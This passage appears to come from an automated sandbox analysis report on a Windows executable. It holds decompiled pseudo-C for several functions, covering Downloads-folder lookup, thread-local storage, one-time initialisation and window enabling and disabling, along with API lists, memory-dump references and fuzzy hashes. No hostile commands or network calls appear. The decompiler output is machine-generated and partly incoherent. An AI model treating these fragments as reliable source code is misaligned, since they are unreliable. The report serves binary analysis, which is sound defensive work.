                                        • wcsncpy.MSVCRT ref: 00406518
                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040657C
                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040658F
                                        • ??3@YAXPAX@Z.MSVCRT ref: 004065A2
                                        • wcsncpy.MSVCRT ref: 004065CE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: ??3@_wcsdupwcsncpy$Value
                                        • String ID: $0A$$0A$$0A
                                        • API String ID: 3451606040-360074770
                                        • Opcode ID: f57968095f1945e4e3120d5f5df55ffcf236026f4025ef2d247ac1db4965f3f4
                                        • Instruction ID: 41c924549dca650ba285c5c4b916f4ebd14f458266c125bda89a4206c0afe033
                                        • Opcode Fuzzy Hash: f57968095f1945e4e3120d5f5df55ffcf236026f4025ef2d247ac1db4965f3f4
                                        • Instruction Fuzzy Hash: 15A1BC71504301AFCB209F18D88166BB7F1EF94348F09093EF98667295E73AD925CB9A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040AE5A, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 91libraryloaderCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 58%
                                        			E0040AE5A(void* __eflags, char _a8) {
				signed int _v4;
				wchar_t* _v8;
				signed int _t11;
				int _t14;
				_Unknown_base(*)()* _t18;
				int _t23;
				struct HINSTANCE__* _t25;
				wchar_t* _t27;
				int _t28;
				void* _t32;

				_t28 = 0;
				_t27 = E0040E8A0(0x104, _a8);
				_t11 = _v4;
				if(_t11 != 2) {
					if(_t11 > 9) {
						L20:
						E0040E9F0(_t26, 0x104 - _t28);
						 *((short*)(_t27 + _t28 * 2)) = 0;
						return 0;
					}
					switch( *((intOrPtr*)(_t11 * 4 +  &M0040AF52))) {
						case 0:
							L18:
							_t14 = E0040AF8C(_t29, _t27);
							L19:
							_t28 = _t14;
							goto L20;
						case 1:
							_push(0x26);
							goto L17;
						case 2:
							goto L20;
						case 3:
							_push(5);
							goto L17;
						case 4:
							_push(0x1a);
							goto L17;
						case 5:
							_push(0x23);
							goto L17;
						case 6:
							_push(0xe);
							goto L17;
						case 7:
							_push(0xd);
							goto L17;
						case 8:
							_push(0x27);
							goto L17;
						case 9:
							_push(0x2e);
							L17:
							_pop(_t29);
							goto L18;
					}
				}
				_t25 = LoadLibraryW(L"Shell32.DLL");
				if(_t25 == 0) {
					L6:
					E0040AF8C(0x28, _t27);
					wcscat(_t27, L"Downloads\\");
					_t14 = wcslen(_t27);
					goto L19;
				}
				_t18 = GetProcAddress(_t25, "SHGetKnownFolderPath");
				 *0x418160 = _t18;
				if(_t18 != 0) {
					_t26 =  &_a8;
					_push( &_a8);
					_push(0);
					_push(0);
					_push(0x417110);
					if( *_t18() == 0) {
						wcscpy(_t27, _v8);
						wcscat(_t27, "\\");
						_t23 = wcslen(_t27);
						_t32 = _t32 + 0x14;
						_t28 = _t23;
						 *0x41768c(_v8);
					}
				}
				FreeLibrary(_t25);
				if(_t28 != 0) {
					goto L20;
				} else {
					goto L6;
				}
			}













                                        0x0040ae67
                                        0x0040ae6f
                                        0x0040ae71
                                        0x0040ae78
                                        0x0040af0c
                                        0x0040af3d
                                        0x0040af40
                                        0x0040af47
                                        0x0040af4f
                                        0x0040af4f
                                        0x0040af0e
                                        0x00000000
                                        0x0040af34
                                        0x0040af36
                                        0x0040af3b
                                        0x0040af3b
                                        0x00000000
                                        0x00000000
                                        0x0040af15
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0040af19
                                        0x00000000
                                        0x00000000
                                        0x0040af1d
                                        0x00000000
                                        0x00000000
                                        0x0040af21
                                        0x00000000
                                        0x00000000
                                        0x0040af25
                                        0x00000000
                                        0x00000000
                                        0x0040af29
                                        0x00000000
                                        0x00000000
                                        0x0040af2d
                                        0x00000000
                                        0x00000000
                                        0x0040af31
                                        0x0040af33
                                        0x0040af33
                                        0x00000000
                                        0x00000000
                                        0x0040af0e
                                        0x0040ae89
                                        0x0040ae8d
                                        0x0040aeeb
                                        0x0040aeee
                                        0x0040aef9
                                        0x0040aeff
                                        0x00000000
                                        0x0040af04
                                        0x0040ae95
                                        0x0040ae9b
                                        0x0040aea2
                                        0x0040aea4
                                        0x0040aea8
                                        0x0040aea9
                                        0x0040aeaa
                                        0x0040aeab
                                        0x0040aeb4
                                        0x0040aebb
                                        0x0040aec6
                                        0x0040aecc
                                        0x0040aed1
                                        0x0040aed4
                                        0x0040aeda
                                        0x0040aeda
                                        0x0040aeb4
                                        0x0040aee1
                                        0x0040aee9
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000

                                        APIs
                                          • Part of subcall function 0040E8A0: TlsGetValue.KERNEL32(0000001B,00001000,00000000,00000000), ref: 0040E8AC
                                          • Part of subcall function 0040E8A0: RtlReAllocateHeap.NTDLL(022F0000,00000000,?,?), ref: 0040E907
                                        • LoadLibraryW.KERNEL32(Shell32.DLL,00000104,?,?,?,?,00000009,0040373D,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0040AE83
                                        • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 0040AE95
                                        • wcscpy.MSVCRT ref: 0040AEBB
                                        • wcscat.MSVCRT ref: 0040AEC6
                                        • wcslen.MSVCRT ref: 0040AECC
                                        • 73E3A680.OLE32(?,00000000,00000000,?,022F97F8,00000000,00000000), ref: 0040AEDA
                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00000009,0040373D,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000,00404746,00000000), ref: 0040AEE1
                                        • wcscat.MSVCRT ref: 0040AEF9
                                        • wcslen.MSVCRT ref: 0040AEFF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: Librarywcscatwcslen$A680AddressAllocateFreeHeapLoadProcValuewcscpy
                                        • String ID: Downloads\$SHGetKnownFolderPath$Shell32.DLL
                                        • API String ID: 1562414497-287042676
                                        • Opcode ID: ff7f1bbd071b8fc3a162a107814db3c9431649fc911b1a55be13ec13bba3967d
                                        • Instruction ID: 1ca2cb4c7d7153931bfb56956fae5001cb141d747184a823c9fe3c9ff456261c
                                        • Opcode Fuzzy Hash: ff7f1bbd071b8fc3a162a107814db3c9431649fc911b1a55be13ec13bba3967d
                                        • Instruction Fuzzy Hash: 9B21FFB224830277D320B7619C46F7B3968DF61B91F10053BF505B51C1D6BCC96195AF
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00412402, Relevance: 19.6, APIs: 13, Instructions: 74memoryregistrythreadCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 61%
                                        			E00412402() {
				intOrPtr _v0;
				intOrPtr _v4;
				void* _t11;
				void** _t13;
				void* _t15;
				void* _t16;
				long _t22;
				void* _t24;
				void* _t28;
				HANDLE* _t29;

				if( *0x4186e0 == 0) {
					_t22 = TlsAlloc();
					 *0x418700 = _t22;
					 *0x417518(0x4186e8);
					 *0x4186e0 = 1;
				}
				_t24 = TlsGetValue( *0x418700);
				if(_t24 != 0) {
					L7:
					_t11 = RtlAllocateHeap( *0x418068, 0, 0xc);
					if(_t11 != 0) {
						 *((intOrPtr*)(_t11 + 4)) = _v4;
						 *((intOrPtr*)(_t11 + 8)) = _v0;
						 *_t11 =  *(_t24 + 8);
						 *(_t24 + 8) = _t11;
						return _t11;
					}
				} else {
					_t11 = RtlAllocateHeap( *0x418068, 8, 0x14);
					_t24 = _t11;
					if(_t24 != 0) {
						 *0x41750c(0x4186e8);
						_t13 =  *0x4186e4; // 0x0
						if(_t13 != 0) {
							 *_t13 = _t24;
						}
						 *(_t24 + 4) = _t13;
						 *0x4186e4 = _t24;
						 *0x417514(0x4186e8, _t28);
						_t29 = _t24 + 0x10;
						_t15 = GetCurrentProcess();
						_t16 = GetCurrentThread();
						DuplicateHandle(GetCurrentProcess(), _t16, _t15, _t29, 0x100000, 0, 0);
						_t3 = _t24 + 0xc; // 0xc
						 *0x4175d0(_t3,  *_t29, E004124FA, _t24, 0xffffffff, 8);
						TlsSetValue( *0x418700, _t24);
						goto L7;
					}
				}
				return _t11;
			}













                                        0x00412410
                                        0x00412412
                                        0x00412419
                                        0x0041241e
                                        0x00412424
                                        0x00412424
                                        0x0041243a
                                        0x0041243e
                                        0x004124cb
                                        0x004124d5
                                        0x004124dd
                                        0x004124e3
                                        0x004124ea
                                        0x004124f0
                                        0x004124f2
                                        0x00000000
                                        0x004124f2
                                        0x00412444
                                        0x0041244e
                                        0x00412454
                                        0x00412458
                                        0x0041245f
                                        0x00412465
                                        0x0041246c
                                        0x0041246e
                                        0x0041246e
                                        0x00412472
                                        0x00412475
                                        0x0041247b
                                        0x00412487
                                        0x00412494
                                        0x00412497
                                        0x004124a1
                                        0x004124b3
                                        0x004124b7
                                        0x004124c4
                                        0x00000000
                                        0x004124ca
                                        0x00412458
                                        0x004124f7

                                        APIs
                                        • TlsAlloc.KERNEL32(?,?,0040E658,0040E5C0,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000), ref: 00412412
                                        • RtlInitializeCriticalSection.KERNEL32(004186E8,?,?,0040E658,0040E5C0,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000), ref: 0041241E
                                        • TlsGetValue.KERNEL32(?,?,0040E658,0040E5C0,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000), ref: 00412434
                                        • RtlAllocateHeap.KERNEL32(00000008,00000014,?,?,0040E658,0040E5C0,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000), ref: 0041244E
                                        • RtlEnterCriticalSection.KERNEL32(004186E8,?,?,0040E658,0040E5C0,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000), ref: 0041245F
                                        • RtlLeaveCriticalSection.KERNEL32(004186E8,?,?,?,0040E658,0040E5C0,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000), ref: 0041247B
                                        • GetCurrentProcess.KERNEL32(00000000,00100000,00000000,00000000,?,?,?,0040E658,0040E5C0,00000000,?,00402EF9,00000000,00000000,00000000,00000000), ref: 00412494
                                        • GetCurrentThread.KERNEL32 ref: 00412497
                                        • GetCurrentProcess.KERNEL32(00000000,?,?,?,0040E658,0040E5C0,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000), ref: 0041249E
                                        • DuplicateHandle.KERNEL32(00000000,?,?,?,0040E658,0040E5C0,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000), ref: 004124A1
                                        • RegisterWaitForSingleObject.KERNEL32(0000000C,00000000,004124FA,00000000,000000FF,00000008), ref: 004124B7
                                        • TlsSetValue.KERNEL32(00000000,?,?,?,0040E658,0040E5C0,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000), ref: 004124C4
                                        • RtlAllocateHeap.KERNEL32(00000000,0000000C,?,?,0040E658,0040E5C0,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000), ref: 004124D5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: CriticalCurrentSection$AllocateHeapProcessValue$AllocDuplicateEnterHandleInitializeLeaveObjectRegisterSingleThreadWait
                                        • String ID:
                                        • API String ID: 2673290768-0
                                        • Opcode ID: c4d61d758ab48443083873441c8e21a7ba819af757dc560969e2b3cda97489e7
                                        • Instruction ID: 62803b20a54dae80f84679f0930050cd6fd2b8475098c93851c8b413e97de047
                                        • Opcode Fuzzy Hash: c4d61d758ab48443083873441c8e21a7ba819af757dc560969e2b3cda97489e7
                                        • Instruction Fuzzy Hash: 20210770644301BFDB119F64ED88B963BB9FB48351F10C43AF509962A0CBB49850CB68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040E063, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 53librarysleeploaderCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 68%
                                        			E0040E063(void* __ecx, LONG* _a4, intOrPtr _a8) {
				char _v8;
				struct HINSTANCE__* _t5;
				long _t7;
				int _t9;
				_Unknown_base(*)()* _t10;
				void* _t13;
				struct HINSTANCE__* _t18;
				LONG* _t21;

				_t13 = 0;
				_t5 = LoadLibraryW( &M00413708);
				_t21 = _a4;
				_t18 = _t5;
				if(_t18 == 0) {
					L4:
					_t7 = InterlockedCompareExchange(_t21, 1, 0);
					if(_t7 == 0) {
						_a8();
						_t9 = InterlockedExchange(_t21, 2);
					} else {
						_t9 = _t7 - 1;
						if(_t9 == 0) {
							while( *_t21 != 2) {
								Sleep(0);
							}
						}
					}
				} else {
					_t10 = GetProcAddress(_t18, "InitOnceExecuteOnce");
					if(_t10 != 0) {
						 *_t10(_t21, E0040E043, _a8,  &_v8);
						_t13 = 1;
					}
					_t9 = FreeLibrary(_t18);
					if(_t13 == 0) {
						goto L4;
					}
				}
				return _t9;
			}











                                        0x0040e06f
                                        0x0040e071
                                        0x0040e077
                                        0x0040e07a
                                        0x0040e07e
                                        0x0040e0ab
                                        0x0040e0b6
                                        0x0040e0b9
                                        0x0040e0cf
                                        0x0040e0d5
                                        0x0040e0bb
                                        0x0040e0bb
                                        0x0040e0bc
                                        0x0040e0c8
                                        0x0040e0c2
                                        0x0040e0c2
                                        0x0040e0cd
                                        0x0040e0bc
                                        0x0040e080
                                        0x0040e086
                                        0x0040e08e
                                        0x0040e09d
                                        0x0040e09f
                                        0x0040e09f
                                        0x0040e0a1
                                        0x0040e0a9
                                        0x00000000
                                        0x00000000
                                        0x0040e0a9
                                        0x0040e0e1

                                        APIs
                                        • LoadLibraryW.KERNEL32(Kernel32.dll,00000000,00000000,00000000,00000004,00000000,0040DE75,0041867C,0040E002,00000000,FFFFFFED,00000200,772E4620,0040A496,FFFFFFED,00000010), ref: 0040E071
                                        • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 0040E086
                                        • FreeLibrary.KERNEL32(00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040E0A1
                                        • InterlockedCompareExchange.KERNEL32(00000000,00000001,00000000), ref: 0040E0B0
                                        • Sleep.KERNEL32(00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040E0C2
                                        • InterlockedExchange.KERNEL32(00000000,00000002), ref: 0040E0D5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: ExchangeInterlockedLibrary$AddressCompareFreeLoadProcSleep
                                        • String ID: InitOnceExecuteOnce$Kernel32.dll
                                        • API String ID: 2918862794-1339284965
                                        • Opcode ID: 507b8423a8f12f09eb865d8343168cb605b0c01540fdcaa8b2c67cd898653b84
                                        • Instruction ID: a0924c4a9c69e965f3c3b2d51ddae26940667e1579042f32cad495fc5e2201b0
                                        • Opcode Fuzzy Hash: 507b8423a8f12f09eb865d8343168cb605b0c01540fdcaa8b2c67cd898653b84
                                        • Instruction Fuzzy Hash: 9D018471254224FBD6201FA29C49FAB7B79EB41752F10843AF505B21C0EAFC9A119A6E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004094A7, Relevance: 12.0, APIs: 8, Instructions: 50threadwindowCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 64%
                                        			E004094A7(struct HWND__* _a4) {
				long _t8;
				long _t14;
				struct HWND__* _t23;
				long* _t25;

				_t23 = _a4;
				_t8 = GetWindowThreadProcessId(_t23, 0);
				if(_t8 == GetCurrentThreadId() && IsWindowVisible(_t23) != 0) {
					_push(0x14);
					_t25 = E0040E192(0x418144);
					_t25[1] = _t23;
					_t14 = GetCurrentThreadId();
					_push(0xffffffec);
					 *_t25 = _t14;
					_push(_t23);
					_t25[2] = 0;
					if(( *0x4175ec() & 0x00000008) != 0) {
						_t25[2] = 1;
					}
					if(_t23 != GetForegroundWindow() && IsWindowEnabled(_t23) != 0) {
						_t25[2] = 1;
						EnableWindow(_t23, 0);
					}
				}
				return 1;
			}







                                        0x004094aa
                                        0x004094b1
                                        0x004094c3
                                        0x004094d0
                                        0x004094dc
                                        0x004094e0
                                        0x004094e3
                                        0x004094e5
                                        0x004094e9
                                        0x004094eb
                                        0x004094ec
                                        0x004094f8
                                        0x004094fa
                                        0x004094fa
                                        0x00409506
                                        0x00409515
                                        0x00409519
                                        0x00409519
                                        0x00409506
                                        0x00409525

                                        APIs
                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 004094B1
                                        • GetCurrentThreadId.KERNEL32 ref: 004094BF
                                        • IsWindowVisible.USER32 ref: 004094C6
                                          • Part of subcall function 0040E192: RtlAllocateHeap.KERNEL32(00000008,00000000,0040DA0C,00418670,00000014,?,?,?,?,00409614,00000010,00000000,00000000,00401071,00000000,00001000), ref: 0040E19E
                                        • GetCurrentThreadId.KERNEL32 ref: 004094E3
                                        • 7313B110.USER32(?,000000EC), ref: 004094F0
                                        • GetForegroundWindow.USER32 ref: 004094FE
                                        • IsWindowEnabled.USER32(?), ref: 00409509
                                        • EnableWindow.USER32(?,00000000), ref: 00409519
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: Window$Thread$Current$7313AllocateB110EnableEnabledForegroundHeapProcessVisible
                                        • String ID:
                                        • API String ID: 2617805403-0
                                        • Opcode ID: 68a633d90a34132dfb5e2fdbc66a21f5e6654eddc9afd13cb677bbd48b54e552
                                        • Instruction ID: c398d19e1468fbf83029760c8fcca5c7f4df6c6d9856ae184ed0b78c4f3d7d57
                                        • Opcode Fuzzy Hash: 68a633d90a34132dfb5e2fdbc66a21f5e6654eddc9afd13cb677bbd48b54e552
                                        • Instruction Fuzzy Hash: DB0188321483016ED3215F7ADC88AABB7F8EF91765B14843EF541E32A2DB749C41C629
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00408E54, Relevance: 10.6, APIs: 7, Instructions: 54memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 58%
                                        			E00408E54(intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				intOrPtr _t10;
				void* _t13;
				void* _t19;
				WCHAR** _t20;
				WCHAR* _t22;
				void* _t28;
				void* _t31;
				int _t32;

				_t10 = _a8;
				if(_t10 == 0) {
					UnregisterClassW( *0x417108,  *0x41806c);
					 *0x418128 = 1;
				} else {
					_t13 = _t10 - 0xe;
					if(_t13 == 0) {
						L6:
						E00409292();
						 *0x4175e8(_a4);
					} else {
						if(_t13 != 0x101) {
							goto ( *0x4175e4);
						}
						_t19 = (_a12 & 0x0000ffff) - 0x3e8;
						if(_t19 == 0) {
							_t20 =  *0x4175ec(_a4, 0xffffffeb, _t28, _t31);
							_t5 = GetWindowTextLengthW( *0x418130) + 1; // 0x1
							_t32 = _t5;
							_t22 = RtlAllocateHeap( *0x418068, 0, _t32 + _t32);
							 *_t20 = _t22;
							GetWindowTextW( *0x418130, _t22, _t32);
							E00409292();
							 *0x4175e8(_a4);
						} else {
							if(_t19 == 1) {
								goto L6;
							}
						}
					}
				}
				return 0;
			}











                                        0x00408e5b
                                        0x00408e5c
                                        0x00408ef3
                                        0x00408ef9
                                        0x00408e62
                                        0x00408e62
                                        0x00408e65
                                        0x00408e85
                                        0x00408e85
                                        0x00408e8d
                                        0x00408e67
                                        0x00408e6c
                                        0x00408e6f
                                        0x00408e6f
                                        0x00408e7b
                                        0x00408e80
                                        0x00408e9c
                                        0x00408eb0
                                        0x00408eb0
                                        0x00408ebf
                                        0x00408ecd
                                        0x00408ecf
                                        0x00408ed5
                                        0x00408edd
                                        0x00408e82
                                        0x00408e83
                                        0x00000000
                                        0x00000000
                                        0x00408e83
                                        0x00408e80
                                        0x00408e65
                                        0x00408f06

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: 73149840TextWindow$7313AllocateB110ClassHeapLengthUnregister
                                        • String ID:
                                        • API String ID: 2031932613-0
                                        • Opcode ID: ca4cc7f519db205ffb5b9bf01c667fb51be378d44b9a76d28076419e07c32869
                                        • Instruction ID: 9d4cd0a38627794ba150925f6b15dfa2633538f6def361a87c165639b454e583
                                        • Opcode Fuzzy Hash: ca4cc7f519db205ffb5b9bf01c667fb51be378d44b9a76d28076419e07c32869
                                        • Instruction Fuzzy Hash: 7911093114821AFFCB115F64ED0C9EA3F76EB14351B10C03AF985A26B0CF759952DB98
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00409528, Relevance: 9.1, APIs: 6, Instructions: 68threadCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00409528(long _a4) {
				int _t11;
				long _t12;
				int _t15;
				intOrPtr* _t16;
				intOrPtr* _t17;
				intOrPtr* _t22;
				intOrPtr* _t23;

				if(_a4 == 0) {
					_t22 =  *0x418144; // 0x0
					if(_t22 != 0) {
						do {
							_t16 =  *_t22;
							_t6 = _t22 + 8; // 0x8
							_t25 = _t6;
							_t12 = GetCurrentThreadId();
							if( *_t6 == _t12) {
								if( *((char*)(_t22 + 0x11)) != 0) {
									EnableWindow( *(_t22 + 0xc), 1);
								}
								if( *((char*)(_t22 + 0x10)) != 0) {
									SetWindowPos( *(_t22 + 0xc), 0xffffffff, 0, 0, 0, 0, 3);
								}
								_t12 = E0040E152(0x418144, _t25);
							}
							_t22 = _t16;
						} while (_t16 != 0);
						return _t12;
					}
				} else {
					_t11 = EnumWindows(E004094A7, _a4);
					_t23 =  *0x418144; // 0x0
					if(_t23 != 0) {
						do {
							_t17 =  *_t23;
							_t15 = GetCurrentThreadId();
							if( *((intOrPtr*)(_t23 + 8)) == _t15 &&  *((char*)(_t23 + 0x10)) != 0) {
								_t15 = SetWindowPos( *(_t23 + 0xc), 0xfffffffe, 0, 0, 0, 0, 3);
							}
							_t23 = _t17;
						} while (_t17 != 0);
						return _t15;
					}
				}
				return _t11;
			}










                                        0x00409530
                                        0x0040957d
                                        0x00409585
                                        0x0040958a
                                        0x0040958a
                                        0x0040958c
                                        0x0040958c
                                        0x0040958f
                                        0x00409598
                                        0x0040959e
                                        0x004095a5
                                        0x004095a5
                                        0x004095af
                                        0x004095bc
                                        0x004095bc
                                        0x004095c8
                                        0x004095ce
                                        0x004095cf
                                        0x004095d1
                                        0x00000000
                                        0x004095d5
                                        0x00409532
                                        0x0040953b
                                        0x00409541
                                        0x00409549
                                        0x00409551
                                        0x00409551
                                        0x00409553
                                        0x0040955c
                                        0x0040956f
                                        0x0040956f
                                        0x00409575
                                        0x00409577
                                        0x00000000
                                        0x00409551
                                        0x00409549
                                        0x004095d9

                                        APIs
                                        • EnumWindows.USER32(004094A7,?), ref: 0040953B
                                        • GetCurrentThreadId.KERNEL32 ref: 00409553
                                        • SetWindowPos.USER32(?,000000FE,00000000,00000000,00000000,00000000,00000003,?,?,?,?,?), ref: 0040956F
                                        • GetCurrentThreadId.KERNEL32 ref: 0040958F
                                        • EnableWindow.USER32(?,00000001), ref: 004095A5
                                        • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003,?,?,?,?,?), ref: 004095BC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: Window$CurrentThread$EnableEnumWindows
                                        • String ID:
                                        • API String ID: 2527101397-0
                                        • Opcode ID: 9f61ee1a9fed7bf056d71e6947203a4e8cac434044be54b910f3e5cda9c851ab
                                        • Instruction ID: 71b62f8a8df511e4ad836ad391da5a23806aafab7c99dcb8f1b90406966d289b
                                        • Opcode Fuzzy Hash: 9f61ee1a9fed7bf056d71e6947203a4e8cac434044be54b910f3e5cda9c851ab
                                        • Instruction Fuzzy Hash: 9611CD32549781BBD7324B17EC48F43BBB9AB81B21F14863EF056222E1CB756D44C618
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040D973, Relevance: 9.1, APIs: 6, Instructions: 66memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 79%
                                        			E0040D973(long _a4) {
				long _v0;
				long _v4;
				long _t7;
				long _t8;
				long* _t12;
				void* _t18;
				long _t21;
				signed int _t23;
				long _t28;
				long _t29;
				long _t30;
				void* _t31;

				_t29 = _a4;
				_t23 = _t29 & 0x00000003;
				if(_t23 != 0) {
					_t18 = 4;
					_t29 = _t29 + _t18 - _t23;
				}
				_t7 =  *0x418674; // 0x10
				if(_t7 == 0) {
					 *0x418678 = TlsAlloc();
					TlsSetValue( *0x418678, RtlAllocateHeap( *0x418068, 8, _t29));
					_t7 =  *0x418674; // 0x10
				}
				_t28 = _t7;
				_t8 = _t7 + _t29;
				 *0x418674 = _t8;
				_t31 = RtlReAllocateHeap( *0x418068, 8, TlsGetValue( *0x418678), _t8);
				TlsSetValue( *0x418678, _t31);
				_t30 = _v4;
				_t21 = _v0;
				if(_t30 != 0 || _t21 != 0) {
					_push(0x14);
					_t12 = E0040E192(0x418670);
					 *_t12 = _t28;
					_t12[1] = _t30;
					_t12[2] = _t21;
					if(_t30 != 0) {
						 *_t30(_t31 + _t28);
					}
				}
				return _t28;
			}















                                        0x0040d976
                                        0x0040d97d
                                        0x0040d980
                                        0x0040d984
                                        0x0040d987
                                        0x0040d987
                                        0x0040d989
                                        0x0040d996
                                        0x0040d9a7
                                        0x0040d9b9
                                        0x0040d9bb
                                        0x0040d9bb
                                        0x0040d9c0
                                        0x0040d9c2
                                        0x0040d9cb
                                        0x0040d9e5
                                        0x0040d9ee
                                        0x0040d9f0
                                        0x0040d9f4
                                        0x0040d9fa
                                        0x0040da00
                                        0x0040da07
                                        0x0040da0e
                                        0x0040da10
                                        0x0040da13
                                        0x0040da18
                                        0x0040da1e
                                        0x0040da20
                                        0x0040da18
                                        0x0040da27

                                        APIs
                                        • TlsAlloc.KERNEL32(?,?,?,?,00409614,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D998
